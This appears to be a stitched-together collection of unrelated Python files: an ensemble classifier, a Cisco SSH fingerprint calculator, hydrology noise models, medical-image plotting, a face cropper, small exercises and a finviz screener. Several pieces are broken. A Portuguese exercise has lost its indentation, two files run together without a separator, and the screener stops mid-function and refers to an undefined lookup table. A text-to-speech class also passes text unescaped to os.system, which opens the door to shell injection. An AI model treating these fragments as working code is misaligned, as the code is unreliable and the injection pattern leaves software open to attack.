        self.assertEqual(AppKit.NSNextStepInterfaceStyle, 1)
        self.assertEqual(AppKit.NSWindows95InterfaceStyle, 2)
        self.assertEqual(AppKit.NSMacintoshInterfaceStyle, 3)
        # The default-style key is bridged as a Python string.
        self.assertIsInstance(AppKit.NSInterfaceStyleDefault, str)

    def testFunctions(self):
        # Looking up a style for a key (with no responder) returns an int.
        v = AppKit.NSInterfaceStyleForKey("button", None)
        self.assertIsInstance(v, int)
|
def Pomodoro(time):
    """Return the timer duration in seconds for a request of *time* minutes.

    Falls back to the classic 25-minute pomodoro (1500 s) when the request
    is zero, negative, or longer than two hours.  (The original returned a
    negative number of seconds for negative input.)
    """
    if time <= 0 or time > 120:
        return 25 * 60
    return time * 60
|
import numpy as np
from sklearn.base import clone
from sklearn.metrics import accuracy_score
from python_ml.Ensemble.Combination.VotingSchemes import majority_voting
class RandomSubspace(object):
    """Random Subspace ensemble: each pool member is trained on a random
    subset of the features and predictions are combined by voting.

    Parameters
    ----------
    base_classifier : estimator
        Prototype classifier; the pool holds `pool_size` unfitted clones.
    pool_size : int
        Number of classifiers in the ensemble.
    percentage : float, optional
        Fraction of features drawn (without replacement) for each member
        (default 0.5).  Ignored when pool_size == 1: that single member
        receives the full feature set.
    """

    def __init__(self, base_classifier, pool_size, percentage=0.5):
        self.has_been_fit = False
        self.pool_size = pool_size
        self.percentage = percentage
        # Independent, unfitted clones of the base classifier.
        self.classifiers = [clone(base_classifier)
                            for _ in range(self.pool_size)]
        self.training_sets = []
        # Per-member feature indices, filled in by _generate_set().
        self.selected_features = []

    def _generate_set(self, X, y):
        """Draw the feature subset for one member and return its training
        data; records the chosen indices in self.selected_features."""
        num_features_original = X.shape[1]
        if self.pool_size == 1:
            # A lone classifier gets every feature.
            X_set = X
            y_set = y
            self.selected_features.append(np.arange(num_features_original))
        else:
            idx = np.random.choice(
                num_features_original,
                int(np.round(self.percentage * num_features_original)),
                replace=False)
            X_set = X[:, idx]
            y_set = y[:]
            self.selected_features.append(idx)
        return X_set, y_set

    def fit(self, X, y):
        """Fit every member on its own feature subset.

        A second call is a no-op once fitted.  Returns self so calls can
        be chained (sklearn convention; the original returned None).
        """
        if not self.has_been_fit:
            for clf in self.classifiers:
                X_this, y_this = self._generate_set(X, y)
                clf.fit(X_this, y_this)
            self.has_been_fit = True
        return self

    def predict(self, X, voting_scheme='majority vote'):
        """Predict labels for X by combining the members' votes.

        `voting_scheme` may be the string 'majority vote' or a callable
        taking an (n_samples, n_classifiers) prediction matrix.
        Raises if the ensemble has not been fit.
        """
        if not self.has_been_fit:
            raise Exception('Classifier has not been fit')
        if isinstance(voting_scheme, str):
            if voting_scheme == 'majority vote':
                voting_scheme = majority_voting
        predictions = []
        for i, clf in enumerate(self.classifiers):
            selected_features = self.selected_features[i]
            predictions.append(clf.predict(X[:, selected_features]))
        # Transpose so rows are samples and columns are classifiers.
        predictions = np.array(predictions).T
        return voting_scheme(predictions)

    def score(self, X, y):
        """Mean accuracy of the ensemble's majority-vote predictions."""
        return accuracy_score(y, self.predict(X))
|
#!/usr/bin/env python
__description__ = 'Calculate the SSH fingerprint from a Cisco public key dumped with command "show crypto key mypubkey rsa"'
__author__ = 'Didier Stevens'
__version__ = '0.0.2'
__date__ = '2014/08/19'
"""
Source code put in public domain by Didier Stevens, no Copyright
https://DidierStevens.com
Use at your own risk
History:
2011/12/20: start
2011/12/30: added SplitPerXCharacters
2014/08/19: fixed bug MatchLength
Todo:
"""
import optparse
import struct
import hashlib
def IsHexDigit(string):
    """Return True when *string* is non-empty and consists only of
    hexadecimal digits (0-9, a-f, A-F)."""
    if string == '':
        return False
    return all(char.isdigit() or 'a' <= char.lower() <= 'f'
               for char in string)
def HexDumpFile2Data(filename):
    """Read a text file containing a hex dump and return the decoded data
    as a string of characters (one per byte).

    Returns None when the file cannot be opened, contains non-hex
    characters, or holds an odd number of hex digits.
    """
    try:
        f = open(filename, 'r')
    except IOError:
        # Narrowed from a bare except: only an unreadable file is expected.
        return None
    try:
        # Strip newlines and spaces so the dump may be wrapped and grouped.
        hexdigits = ''.join(line.replace('\n', '').replace(' ', '')
                            for line in f.readlines())
    finally:
        f.close()
    if not IsHexDigit(hexdigits):
        return None
    if len(hexdigits) % 2 != 0:
        return None
    # Decode each pair of hex digits to one character.
    return ''.join(chr(int(hexdigits[i:i + 2], 16))
                   for i in range(0, len(hexdigits), 2))
def MatchByte(byte, data):
    """Try to consume one leading byte with value *byte* from *data*.

    Returns (remaining_data, matched): on success the first character is
    consumed; on failure *data* is returned unchanged.
    """
    if len(data) >= 1 and ord(data[0]) == byte:
        return (data[1:], True)
    return (data, False)
def MatchLength(data):
    """Consume a DER length field from the front of *data*.

    Returns (remaining_data, matched, length).  A first byte <= 0x80 is
    taken as a short-form length; otherwise the low bits give the number
    of following big-endian length bytes.
    """
    if not data:
        return (data, False, 0)
    first = ord(data[0])
    if first <= 0x80:  # a# check 80
        return (data[1:], True, first)
    count_bytes = first - 0x80
    rest = data[1:]
    if len(rest) < count_bytes:
        return (rest, False, 0)
    value = 0
    for ch in rest[:count_bytes]:
        value = value * 0x100 + ord(ch)
    return (rest[count_bytes:], True, value)
def MatchString(string, data):
    """Try to consume the exact prefix *string* from the front of *data*.

    Returns (remaining_data, matched); *data* is unchanged on failure.
    """
    if not data.startswith(string):
        return (data, False)
    return (data[len(string):], True)
def ParsePublicKeyDER(data):
    """Parse a DER-encoded SubjectPublicKeyInfo structure of an RSA key.

    Returns a (modulus, exponent) tuple of raw character strings, or None
    (after printing a diagnostic) when the structure does not match.
    """
    # Outer SEQUENCE header.
    data, match = MatchByte(0x30, data)
    if not match:
        print('Parse error: expected sequence (0x30)')
        return None
    data, match, length = MatchLength(data)
    if not match:
        print('Parse error: expected length')
        return None
    if length > len(data):
        print('Parse error: incomplete DER encoded key 1: %d' % length)
        return None
    # AlgorithmIdentifier matched as raw bytes:
    # SEQUENCE { OID rsaEncryption (1.2.840.113549.1.1.1), NULL }.
    data, match = MatchString('\x30\x0D\x06\x09\x2A\x86\x48\x86\xF7\x0D\x01\x01\x01\x05\x00', data)
    if not match:
        print('Parse error: expected OID rsaEncryption')
        return None
    # BIT STRING wrapping the RSAPublicKey payload.
    data, match = MatchByte(0x03, data)
    if not match:
        print('Parse error: expected bitstring (0x03)')
        return None
    data, match, length = MatchLength(data)
    if not match:
        print('Parse error: expected length')
        return None
    if length > len(data):
        print('Parse error: incomplete DER encoded key 2: %d' % length)
        return None
    # Leading byte of the bit string: number of unused bits, must be 0.
    data, match = MatchByte(0x00, data)
    if not match:
        print('Parse error: expected no padding (0x00)')
        return None
    # Inner SEQUENCE: RSAPublicKey ::= SEQUENCE { modulus, publicExponent }.
    data, match = MatchByte(0x30, data)
    if not match:
        print('Parse error: expected sequence (0x30)')
        return None
    data, match, length = MatchLength(data)
    if not match:
        print('Parse error: expected length')
        return None
    if length > len(data):
        print('Parse error: incomplete DER encoded key 3: %d' % length)
        return None
    # INTEGER: the modulus, kept as raw bytes.
    data, match = MatchByte(0x02, data)
    if not match:
        print('Parse error: expected integer (0x02)')
        return None
    data, match, length = MatchLength(data)
    if not match:
        print('Parse error: expected length')
        return None
    if length > len(data):
        print('Parse error: incomplete DER encoded key 4: %d' % length)
        return None
    modulus = data[:length]
    data = data[length:]
    # INTEGER: the public exponent, kept as raw bytes.
    data, match = MatchByte(0x02, data)
    if not match:
        print('Parse error: expected integer (0x02)')
        return None
    data, match, length = MatchLength(data)
    if not match:
        print('Parse error: expected length')
        return None
    if length > len(data):
        print('Parse error: incomplete DER encoded key 5: %d' % length)
        return None
    exponent = data[:length]
    return (modulus, exponent)
def LengthEncode(data):
    """Prefix *data* with its length as a 4-byte big-endian integer
    (SSH wire-format string encoding)."""
    # NOTE(review): concatenating struct.pack output with a str operand
    # assumes Python 2 (this whole script uses py2 string/byte idioms).
    return struct.pack('>I', len(data)) + data
def CalcFingerprint(modulus, exponent):
    """Return the MD5 hex digest of the length-prefixed 'ssh-rsa' key blob
    built from *exponent* and *modulus* (in that order)."""
    data = LengthEncode('ssh-rsa') + LengthEncode(exponent) + LengthEncode(modulus)
    return hashlib.md5(data).hexdigest()
def SplitPerXCharacters(string, count):
    """Split *string* into consecutive chunks of at most *count* characters.

    (The original used `iter` as its loop variable, shadowing the builtin.)
    """
    return [string[i:i + count] for i in range(0, len(string), count)]
def CiscoCalculateSSHFingerprint(filename):
    """Decode the hex dump in *filename*, parse the DER RSA public key and
    print its colon-separated MD5 SSH fingerprint."""
    publicKeyDER = HexDumpFile2Data(filename)
    if publicKeyDER is None:  # identity test replaces `== None`
        print('Error reading public key')
        return
    result = ParsePublicKeyDER(publicKeyDER)
    if result is None:
        # ParsePublicKeyDER already printed a diagnostic.
        return
    fingerprint = CalcFingerprint(result[0], result[1])
    print(':'.join(SplitPerXCharacters(fingerprint, 2)))
def Main():
    """Command-line entry point: expects exactly one argument, the file
    holding the hex dump of the public key."""
    oParser = optparse.OptionParser(usage='usage: %prog file\n' + __description__, version='%prog ' + __version__)
    (options, args) = oParser.parse_args()
    if len(args) != 1:
        # Wrong usage: show help plus provenance notice, then exit.
        oParser.print_help()
        print('')
        print(' Source code put in the public domain by Didier Stevens, no Copyright')
        print(' Use at your own risk')
        print(' https://DidierStevens.com')
        return
    else:
        CiscoCalculateSSHFingerprint(args[0])


if __name__ == '__main__':
    Main()
|
"""
10
Enunciado
Faça um programa que sorteie 10 números entre 0 e 100 e imprima:
a. o maior número sorteado;
b. o menor número sorteado;
c. a média dos números sorteados;
d. a soma dos números sorteados.
"""
import random
lista = []
for c in range(0, 10):
numeros = random.randint(0, 100)
lista.append(numeros)
print(lista)
print(max(lista))
print(min(lista))
soma = 0
for c in lista:
soma = soma + c
media = soma/len(lista)
print(media)
print(soma) |
"""The noisemodels module contains all noisemodels available in Pastas.
Author: R.A. Collenteur, 2017
"""
from abc import ABC
from logging import getLogger
import numpy as np
import pandas as pd
from .decorators import set_parameter
logger = getLogger(__name__)
__all__ = ["NoiseModel", "NoiseModel2"]
class NoiseModelBase(ABC):
    """Abstract base for Pastas noise models.

    Holds the shared parameter table (one row per parameter with initial
    value, bounds, vary flag and name) and the setters used by the model.
    """
    _name = "NoiseModelBase"

    def __init__(self):
        self.nparam = 0
        self.name = "noise"
        self.parameters = pd.DataFrame(
            columns=["initial", "pmin", "pmax", "vary", "name"])

    def set_init_parameters(self, oseries=None):
        """Initialize the noise_alpha parameter row.

        When an observation series is given, the initial alpha is the
        median time step of its index (in days); otherwise 14 days.
        """
        if oseries is not None:
            pinit = oseries.index.to_series().diff() / pd.Timedelta(1, "d")
            pinit = pinit.median()
        else:
            pinit = 14.0
        self.parameters.loc["noise_alpha"] = (pinit, 0, 5000, True, "noise")

    @set_parameter
    def set_initial(self, name, value):
        """Internal method to set the initial parameter value.

        Notes
        -----
        The preferred method for parameter setting is through the model.
        """
        if name in self.parameters.index:
            self.parameters.loc[name, "initial"] = value
        else:
            print("Warning:", name, "does not exist")

    @set_parameter
    def set_pmin(self, name, value):
        """Internal method to set the minimum value of the noisemodel.

        Notes
        -----
        The preferred method for parameter setting is through the model.
        """
        if name in self.parameters.index:
            self.parameters.loc[name, "pmin"] = value
        else:
            print("Warning:", name, "does not exist")

    @set_parameter
    def set_pmax(self, name, value):
        """Internal method to set the maximum parameter values.

        Notes
        -----
        The preferred method for parameter setting is through the model.
        """
        if name in self.parameters.index:
            self.parameters.loc[name, "pmax"] = value
        else:
            print("Warning:", name, "does not exist")

    @set_parameter
    def set_vary(self, name, value):
        """Internal method to set if the parameter is varied during
        optimization.

        Notes
        -----
        The preferred method for parameter setting is through the model.
        """
        # Guard against unknown names, consistent with the other setters.
        # The original assigned unconditionally; .loc with a new label
        # silently enlarges the frame with a mostly-NaN row on a typo.
        if name in self.parameters.index:
            self.parameters.loc[name, "vary"] = value
        else:
            print("Warning:", name, "does not exist")

    def to_dict(self):
        """Serialization hook: minimal dict identifying the model type."""
        return {"type": self._name}
class NoiseModel(NoiseModelBase):
    """Noise model with exponential decay of the residual and
    weighting with the time step between observations.

    Notes
    -----
    Calculates the noise [1]_ according to:

    .. math::
        v(t1) = r(t1) - r(t0) * exp(- (t1 - t0) / alpha)

    Note that in the referenced paper, alpha is defined as the inverse of
    alpha used in Pastas. The unit of the alpha parameter is always in days.

    Examples
    --------
    It can happen that the noisemodel is used during model calibration
    to explain most of the variation in the data. A recommended solution is to
    scale the initial parameter with the model timestep, E.g.::

    >>> n = NoiseModel()
    >>> n.set_initial("noise_alpha", 1.0 * ml.get_dt(ml.freq))

    References
    ----------
    .. [1] von Asmuth, J. R., and M. F. P. Bierkens (2005), Modeling irregularly spaced residual series as a continuous stochastic process, Water Resour. Res., 41, W12404, doi:10.1029/2004WR003726.
    """
    _name = "NoiseModel"

    def __init__(self):
        NoiseModelBase.__init__(self)
        self.nparam = 1
        self.set_init_parameters()

    def simulate(self, res, parameters):
        """
        Parameters
        ----------
        res : pandas.Series
            The residual series.
        parameters : array-like, optional
            Alpha parameters used by the noisemodel.

        Returns
        -------
        noise: pandas.Series
            Series of the noise.

        Notes
        -----
        NOTE(review): `res` is modified in place and then returned;
        pass a copy if the residuals are needed afterwards.
        """
        alpha = parameters[0]
        # Time steps between consecutive observations, in days.
        odelt = (res.index[1:] - res.index[:-1]).values / pd.Timedelta("1d")
        # res.values is needed else it gets messed up with the dates
        v = res.values[1:] - np.exp(-odelt / alpha) * res.values[:-1]
        res.iloc[1:] = v * self.weights(alpha, odelt)
        # First value has no predecessor, so its noise is defined as 0.
        res.iloc[0] = 0
        res.name = "Noise"
        return res

    @staticmethod
    def weights(alpha, odelt):
        """Method to calculate the weights for the noise based on the
        sum of weighted squared noise (SWSI) method.

        Parameters
        ----------
        alpha : float
            Decay parameter, in days.
        odelt : numpy.ndarray
            Time steps between observations, in days.

        Returns
        -------
        numpy.ndarray of weights, one per noise value.
        """
        # divide power by 2 as nu / sigma is returned
        power = 1.0 / (2.0 * odelt.size)
        exp = np.exp(-2.0 / alpha * odelt)  # Twice as fast as 2*odelt/alpha
        # Geometric-mean normalization divided by per-step std factor.
        w = np.exp(power * np.sum(np.log(1.0 - exp))) / np.sqrt(1.0 - exp)
        return w
class NoiseModel2(NoiseModelBase):
    """
    Noise model with exponential decay of the residual.

    Notes
    -----
    Calculates the noise according to:

    .. math::
        v(t1) = r(t1) - r(t0) * exp(- (t1 - t0) / alpha)

    The unit of the alpha parameter is always in days.  Unlike NoiseModel,
    no time-step weighting is applied.

    Examples
    --------
    It can happen that the noisemodel is used during model calibration
    to explain most of the variation in the data. A recommended solution is to
    scale the initial parameter with the model timestep, E.g.::

    >>> n = NoiseModel()
    >>> n.set_initial("noise_alpha", 1.0 * ml.get_dt(ml.freq))
    """
    _name = "NoiseModel2"

    def __init__(self):
        NoiseModelBase.__init__(self)
        self.nparam = 1
        self.set_init_parameters()

    @staticmethod
    def simulate(res, parameters):
        """
        Parameters
        ----------
        res : pandas.Series
            The residual series.
        parameters : array_like, optional
            Alpha parameters used by the noisemodel.

        Returns
        -------
        noise: pandas.Series
            Series of the noise.

        Notes
        -----
        NOTE(review): `res` is modified in place and then returned;
        pass a copy if the residuals are needed afterwards.
        """
        alpha = parameters[0]
        # Time steps between consecutive observations, in days.
        odelt = (res.index[1:] - res.index[:-1]).values / pd.Timedelta("1d")
        # res.values is needed else it gets messed up with the dates
        v = res.values[1:] - np.exp(-odelt / alpha) * res.values[:-1]
        res.iloc[1:] = v
        # First value has no predecessor, so its noise is defined as 0.
        res.iloc[0] = 0
        res.name = "Noise"
        return res
|
import functools
import logging
import warnings
from pathlib import Path
from typing import List, Optional
import monai.transforms.utils as monai_utils
import numpy as np
import plotly.express as px
import plotly.graph_objects as go
import skimage
from sklearn.pipeline import Pipeline
from autorad.config.type_definitions import PathLike
from autorad.utils import io, spatial
from autorad.visualization import plotly_utils
# suppress skimage
warnings.filterwarnings(action="ignore", category=UserWarning)
log = logging.getLogger(__name__)
class Cropper:
    """Performs non-zero cropping"""

    def __init__(self, bbox_size=50, margin=20):
        # bbox_size: edge length of the fixed box used with constant_bbox.
        self.bbox_size = bbox_size
        # margin: voxels of padding added around the selected region.
        self.margin = margin
        # Crop coordinates computed by fit() and reused by transform().
        self.coords_start = None
        self.coords_end = None

    def fit(self, X: np.ndarray, y=None, constant_bbox=False):
        """X is a binary mask"""
        # Add a leading channel dimension, as monai's bbox helper expects.
        expanded_mask = np.expand_dims(X, axis=0)
        if constant_bbox:
            # Fixed-size box centered on the mask (size from __init__).
            select_fn = functools.partial(
                spatial.generate_bbox_around_mask_center,
                bbox_size=self.bbox_size,
            )
        else:
            # Tight box around all positive (non-zero) voxels.
            select_fn = monai_utils.is_positive
        (
            self.coords_start,
            self.coords_end,
        ) = monai_utils.generate_spatial_bounding_box(
            img=expanded_mask,
            select_fn=select_fn,
            margin=[self.margin, self.margin, self.margin],
        )
        return self

    def transform(self, volume: np.ndarray):
        """Apply the crop computed by fit() to a volume of matching shape."""
        log.info(
            f"Cropping the image of size {volume.shape} to the region from \
            {self.coords_start} to {self.coords_end}"
        )
        return spatial.crop_volume_from_coords(
            self.coords_start, self.coords_end, volume
        )
class Slicer:
    """Given a 3D volume, finds its largest cross-section"""

    def __init__(self, axis=2):
        self.slicenum = None  # slice index chosen by fit()
        self.axis = axis  # axis along which 2D slices are taken

    def fit(self, X: np.ndarray, y=None):
        """X is a binary mask"""
        # Pick the slice with the largest mask cross-section along `axis`.
        slicenum = spatial.get_largest_cross_section(X, axis=self.axis)
        self.slicenum = slicenum
        return self

    def transform(self, volume: np.ndarray):
        """Extract the previously selected 2D slice from a 3D volume."""
        indices = [slice(None)] * 3
        indices[self.axis] = self.slicenum
        return volume[tuple(indices)]
def normalize_roi(image_array, mask_array):
    """Min-max normalize an image using only intensities inside the ROI.

    Values are clipped to the [min, max] range of the voxels where
    `mask_array > 0` and scaled to [0, 1].  Returns an all-zero array when
    the ROI is constant (the original divided by zero in that case).
    """
    image_values = image_array[mask_array > 0]
    roi_max = np.max(image_values)
    roi_min = np.min(image_values)
    image_clipped = np.clip(image_array, roi_min, roi_max)
    roi_range = roi_max - roi_min
    if roi_range == 0:
        # Constant ROI: every clipped value equals roi_min; map to 0.
        return np.zeros_like(image_clipped, dtype=float)
    image_norm = (image_clipped - roi_min) / roi_range
    return image_norm
def overlay_mask_contour(
    image_2D: np.ndarray,
    mask_2D: np.ndarray,
    label: int = 1,
    color=(1, 0, 0),  # red
    normalize=False,
):
    """Draw the contour of `mask_2D == label` on top of a 2D image.

    When `normalize` is set, image intensities are first min-max scaled
    using only the values inside the mask.  Returns the image with the
    mask boundary marked in `color` (skimage mark_boundaries output).
    """
    mask_to_plot = mask_2D == label
    if normalize:
        image_2D = normalize_roi(image_2D, mask_to_plot)
    # Convert to uint8, as expected by mark_boundaries.
    image_to_plot = skimage.img_as_ubyte(image_2D)
    result_image = skimage.segmentation.mark_boundaries(
        image_to_plot, mask_to_plot, mode="outer", color=color
    )
    return result_image
def plot_compare_two_masks(
    image_path, manual_mask_path, auto_mask_path, axis=2
):
    """Overlay a manual (red) and an automatic (blue) segmentation contour
    on the largest cross-section of the image; returns a plotly Figure.

    Both masks are resampled onto the image grid; the crop and slice are
    taken from the *manual* mask so both contours share the same frame.
    """
    manual_vols = BaseVolumes.from_nifti(
        image_path,
        manual_mask_path,
        constant_bbox=True,
        resample=True,
        axis=axis,
    )
    auto_vols = BaseVolumes.from_nifti(
        image_path,
        auto_mask_path,
        constant_bbox=True,
        resample=True,
        axis=axis,
    )
    image_2D, manual_mask_2D = manual_vols.get_slices()
    # Slice the auto mask through the manual volumes' preprocessor so the
    # two contours are spatially aligned.
    auto_mask_2D = manual_vols.crop_and_slice(auto_vols.mask)
    img_one_contour = overlay_mask_contour(
        image_2D,
        manual_mask_2D,
    )
    img_two_contours = overlay_mask_contour(
        img_one_contour,
        auto_mask_2D,
        color=(0, 0, 1),  # blue
    )
    fig = px.imshow(img_two_contours)
    fig.update_layout(width=800, height=800)
    plotly_utils.hide_labels(fig)
    return fig
class BaseVolumes:
    """Loading and processing of image and mask volumes."""

    def __init__(
        self,
        image,
        mask,
        label=1,
        constant_bbox=False,
        window="soft tissues",
        axis=2,
    ):
        # Keep the unmodified image; self.image is the display version.
        self.image_raw = image
        if window is None:
            self.image = skimage.exposure.rescale_intensity(image)
        else:
            # Intensity windowing by named preset — presumably a CT
            # windowing preset; confirm in spatial.window_with_preset.
            self.image = spatial.window_with_preset(
                self.image_raw, window=window
            )
        # Binarize the mask to the requested label.
        self.mask = mask == label
        self.axis = axis
        self.preprocessor = self.init_and_fit_preprocessor(constant_bbox)

    def init_and_fit_preprocessor(self, constant_bbox=False):
        """Fit the crop+slice pipeline on the mask so the identical frame
        can later be applied to any aligned volume."""
        preprocessor = Pipeline(
            [
                ("cropper", Cropper()),
                ("slicer", Slicer(axis=self.axis)),
            ]
        )
        preprocessor.fit(
            self.mask,
            cropper__constant_bbox=constant_bbox,
        )
        return preprocessor

    @classmethod
    def from_nifti(
        cls,
        image_path: PathLike,
        mask_path: PathLike,
        resample=False,
        *args,
        **kwargs,
    ):
        """Construct from NIfTI paths; optionally resample the mask onto
        the image grid first."""
        if resample:
            mask, image = spatial.load_and_resample_to_match(
                to_resample=mask_path,
                reference=image_path,
            )
        else:
            image = io.load_image(image_path)
            mask = io.load_image(mask_path)
        return cls(image, mask, *args, **kwargs)

    def crop_and_slice(self, volume: np.ndarray):
        """Apply the fitted crop + largest-slice transform to `volume`."""
        result = self.preprocessor.transform(volume)
        return result

    def get_slices(self):
        """Return the (image_2D, mask_2D) pair at the largest mask slice."""
        image_2D = self.crop_and_slice(self.image)
        mask_2D = self.crop_and_slice(self.mask)
        return image_2D, mask_2D

    def plot_image(self):
        """Plot the cropped 2D image slice as a grayscale plotly figure."""
        image_2D, _ = self.get_slices()
        fig = px.imshow(image_2D, color_continuous_scale="gray")
        plotly_utils.hide_labels(fig)
        return fig
class FeaturePlotter:
    """Plotting of voxel-based radiomics features."""

    def __init__(self, image_path, mask_path, feature_map: dict):
        # Image and mask share one fixed-size crop around the mask so all
        # feature maps are displayed in the same frame.
        self.volumes = BaseVolumes.from_nifti(
            image_path, mask_path, constant_bbox=True
        )
        self.feature_map = feature_map  # feature name -> 3D feature volume
        self.feature_names = list(feature_map.keys())

    @classmethod
    def from_dir(cls, dir_path: str, feature_names: List[str]):
        """Load image, mask and the named feature maps from a directory
        laid out as image.nii.gz / segmentation.nii.gz / <name>.nii.gz."""
        dir_path_obj = Path(dir_path)
        image_path = dir_path_obj / "image.nii.gz"
        mask_path = dir_path_obj / "segmentation.nii.gz"
        feature_map = {}
        for name in feature_names:
            nifti_path = dir_path_obj / f"{name}.nii.gz"
            try:
                # Feature maps may live on a coarser grid; resample them
                # onto the image grid.
                feature_map[name] = spatial.load_and_resample_to_match(
                    nifti_path, image_path, interpolation="bilinear"
                )
            except FileNotFoundError:
                raise FileNotFoundError(
                    f"Could not load feature map {name} in {dir_path}"
                )
        return cls(image_path, mask_path, feature_map)

    def plot_single_feature(
        self,
        feature_name: str,
        feature_range: Optional[tuple[float, float]] = None,
    ):
        """Overlay one feature map as a heatmap (masked to the ROI) on the
        grayscale image slice; `feature_range` pins the color scale."""
        image_2D, mask_2D = self.volumes.get_slices()
        feature_2D = self.volumes.crop_and_slice(
            self.feature_map[feature_name]
        )
        # Hide feature values outside the ROI.
        feature_2D[mask_2D == 0] = np.nan
        fig = px.imshow(image_2D, color_continuous_scale="gray")
        plotly_utils.hide_labels(fig)
        # Plot mask on top of fig, without margins
        heatmap_options = {
            "z": feature_2D,
            "showscale": False,
            "colorscale": "Spectral",
        }
        if feature_range:
            heatmap_options["zmin"] = feature_range[0]
            heatmap_options["zmax"] = feature_range[1]
        fig.add_trace(go.Heatmap(**heatmap_options))
        return fig

    def plot_all_features(self, output_dir, param_ranges):
        """Write the base image and one overlay PNG per feature into
        `output_dir`; `param_ranges` pairs positionally with
        `self.feature_names`."""
        fig = self.volumes.plot_image()
        fig.write_image(Path(output_dir) / "image.png")
        for name, param_range in zip(self.feature_names, param_ranges):
            fig = self.plot_single_feature(name, param_range)
            fig.write_image(Path(output_dir) / f"{name}.png")
|
import cv2
import os
import sys
def facecrop(image):
    """Detect faces in an image file and save each one as cropped_<n>.jpg.

    Parameters
    ----------
    image : str
        Path to the image file to read with cv2.imread.
    """
    # Raw string: the original literal depended on invalid escape sequences
    # ("\P", "\s", ...) happening to survive as literal backslashes.
    cascPath = r"C:\Python36\Lib\site-packages\cv2\data\haarcascade_frontalface_default.xml"
    cascade = cv2.CascadeClassifier(cascPath)
    img = cv2.imread(image)
    # Resizing to the image's own (width, height) is a no-op; kept so the
    # detector sees the same input as before.
    minisize = (img.shape[1], img.shape[0])
    miniframe = cv2.resize(img, minisize)
    faces = cascade.detectMultiScale(miniframe)
    for counter, (x, y, w, h) in enumerate(faces):
        # Outline the face on the full image, then crop that region.
        cv2.rectangle(img, (x, y), (x + w, y + h), (255, 255, 255))
        sub_face = img[y:y + h, x:x + w]
        cv2.imwrite(f"cropped_{counter}.jpg", sub_face)
import sys
def num_nice(input):
    """Count how many newline-separated strings in *input* are nice."""
    return sum(1 for line in input.split('\n') if is_nice(line))
def is_nice(s):
    """A string is nice iff it has a repeated pair and a gap repeat."""
    if not has_non_overlapping_pairs(s):
        return False
    return has_repeat_with_gap(s)
def has_non_overlapping_pairs(s):
    """Return True if some two-letter pair appears at least twice in *s*
    without the occurrences overlapping.

    A pair starting at i can only recur without overlap inside s[i+2:],
    so each candidate pair is searched in the remainder of the string.
    (Fixed: `xrange` is Python 2 only; use `range`.)
    """
    for i in range(len(s) - 3):
        pair = s[i:i + 2]
        if pair in s[i + 2:]:
            return True
    return False
def has_repeat_with_gap(s):
    """Return True if some letter repeats with exactly one letter between
    the two occurrences (e.g. "xyx").

    (Fixed: `xrange` is Python 2 only; use `range`.)
    """
    for i in range(len(s) - 2):
        if s[i] == s[i + 2]:
            return True
    return False
if __name__ == "__main__":
    # Fixed: the Python 2 `print` statement is a SyntaxError on Python 3.
    print(num_nice(sys.stdin.read()))
|
from typing import Iterator
import xmlschema
from xmlschema import XsdElement, XsdComponent
def test_validate(config_folder, fixtures_path):
    """The sample document must validate cleanly against the CIN schema."""
    schema = xmlschema.XMLSchema(config_folder / 'cin.xsd')
    validation_errors = list(schema.iter_errors(fixtures_path / 'sample.xml'))
    # Print each error so a failing run shows what went wrong.
    for err in validation_errors:
        print(err)
    assert not validation_errors
class parents(Iterator[XsdComponent]):
    """Iterate over the ancestors of a component, nearest parent first."""

    def __init__(self, node: XsdComponent):
        self._node = node

    def __next__(self) -> XsdComponent:
        # A node with no `parent` attribute (or a None parent) ends the walk;
        # getattr's default mirrors the original AttributeError handling.
        self._node = getattr(self._node, "parent", None)
        if self._node is None:
            raise StopIteration()
        return self._node
def test_print_schema(config_folder):
    """Print every element of the CIN schema with its ancestor chain.

    (Fixed: removed a stray " |" concatenation artifact that made the last
    line a syntax error.)
    """
    schema = xmlschema.XMLSchema(config_folder / 'cin.xsd')
    for comp in schema.iter_components():
        if isinstance(comp, XsdElement):
            print(comp.name, [p.name for p in parents(comp)])
import os
import random
class Speaker():
    """Thin wrapper around the macOS `say` command-line utility."""

    def __init__(self, name="-v alex ", rate="-r 100 "):
        # Voice and rate are stored as ready-to-concatenate CLI fragments.
        self.name = str(name)
        self.rate = str(rate)

    def __repr__(self):
        return repr("I am who I am")

    def speak(self, words):
        """Speak *words* aloud with the current voice and rate."""
        cleaned = self.stripper(words)
        os.system('say ' + self.name + self.rate + str(cleaned))

    def change_rate(self, rate):
        """Set the speech rate (words per minute) from a string value."""
        self.rate = "-r " + rate + " "

    def change_voice(self, name):
        """Switch to another installed voice by name."""
        self.name = "-v " + name + " "

    def stripper(self, stripped_word):
        """Drop apostrophes, which would break the shell command quoting."""
        return stripped_word.replace("'", "")

    def singer(self, word):
        """Speak *word* with a random rate and pitch — rough 'singing'."""
        cleaned = self.stripper(word)
        pitch_choices = ['40', '50', '60']
        rate_choices = ['-r 90', '-r 120', '-r 170', '-r 100', '-r 150']
        command = (
            'say ' + self.name + random.choice(rate_choices)
            + " [[pbas " + random.choice(pitch_choices) + "]]" + str(cleaned)
        )
        os.system(command)
|
import os
import configparser
import pandas as pd
from finvizfinance.screener import (
technical,
overview,
valuation,
financial,
ownership,
performance,
)
presets_path = os.path.join(os.path.abspath(os.path.dirname(__file__)), "presets/")
# pylint: disable=C0302
def get_screener_data(
    preset_loaded: str, data_type: str, signal: str, limit: int, ascend: bool
):
    """Screener Overview

    Parameters
    ----------
    preset_loaded : str
        Loaded preset filter
    data_type : str
        Data type between: overview, valuation, financial, ownership, performance, technical
    signal : str
        Signal to use to filter data
    limit : int
        Limit of stocks filtered with presets to print
    ascend : bool
        Ascended order of stocks filtered to print

    Returns
    ----------
    pd.DataFrame
        Dataframe with loaded filtered stocks
    """
    preset_filter = configparser.RawConfigParser()
    preset_filter.optionxform = str  # type: ignore
    preset_filter.read(presets_path + preset_loaded + ".ini")

    d_general = preset_filter["General"]
    d_filters = {
        **preset_filter["Descriptive"],
        **preset_filter["Fundamental"],
        **preset_filter["Technical"],
    }

    # Validate every key/value of the preset against the known options
    # before touching the screener; bail out with an empty frame on error.
    for section in ("General", "Descriptive", "Fundamental", "Technical"):
        for key, val in dict(preset_filter[section]).items():
            if key not in d_check_screener:
                print(f"The screener variable {section}.{key} shouldn't exist!\n")
                return pd.DataFrame()
            if val not in d_check_screener[key]:
                print(
                    f"Invalid [{section}] {key}={val}. "
                    f"Choose one of the following options:\n{', '.join(d_check_screener[key])}.\n"
                )
                return pd.DataFrame()

    # Keep only filters with a non-empty value.
